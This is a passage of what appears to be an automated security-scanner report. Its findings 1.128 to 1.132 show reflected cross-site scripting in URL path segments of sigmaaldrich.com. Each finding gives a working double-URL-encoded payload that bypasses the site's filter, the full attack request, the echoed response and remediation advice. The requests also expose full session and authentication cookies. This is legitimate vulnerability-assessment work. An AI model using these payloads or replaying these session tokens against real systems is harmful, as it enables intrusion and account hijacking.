Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:57 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrichb33a1";alert(1)//8c3c0427d0e/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.128. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c6d1%2522%253balert%25281%2529%252f%252fc5eabbb08ea was submitted in the REST URL parameter 3. This input was echoed as 1c6d1";alert(1)//c5eabbb08ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest1c6d1%2522%253balert%25281%2529%252f%252fc5eabbb08ea/life-science/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:58 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest1c6d1";alert(1)//c5eabbb08ea/life-science/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.129. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 648e3%2522%253balert%25281%2529%252f%252f8a4b807a60d was submitted in the REST URL parameter 4. This input was echoed as 648e3";alert(1)//8a4b807a60d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science648e3%2522%253balert%25281%2529%252f%252f8a4b807a60d/zinc-finger-nuclease-technology/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:00 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science648e3";alert(1)//8a4b807a60d/zinc-finger-nuclease-technology/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.130. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538c5%2522%253balert%25281%2529%252f%252f9501d1dbcc8 was submitted in the REST URL parameter 5. This input was echoed as 538c5";alert(1)//9501d1dbcc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology538c5%2522%253balert%25281%2529%252f%252f9501d1dbcc8/custom-zfn HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:02 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology538c5";alert(1)//9501d1dbcc8/custom-zfn","E404") ;
   </script>
...[SNIP]...

1.131. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfn

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f48d6%2522%253balert%25281%2529%252f%252f142bff93666 was submitted in the REST URL parameter 6. This input was echoed as f48d6";alert(1)//142bff93666 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfnf48d6%2522%253balert%25281%2529%252f%252f142bff93666 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28999
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/areas-of-interest/life-science/zinc-finger-nuclease-technology/custom-zfnf48d6";alert(1)//142bff93666","E404") ;
   </script>
...[SNIP]...

1.132. http://www.sigmaaldrich.com/content/sigma-aldrich/areas-of-interest/materials-science/material-science-products [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/areas-of-interest/materials-science/material-science-products

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4a66%2522%253balert%25281%2529%252f%252f9cf202f2c34 was submitted in the REST URL parameter 1. This input was echoed as a4a66";alert(1)//9cf202f2c34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contenta4a66%2522%253balert%25281%2529%252f%252f9cf202f2c34/sigma-aldrich/areas-of-interest/materials-science/material-science-products HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
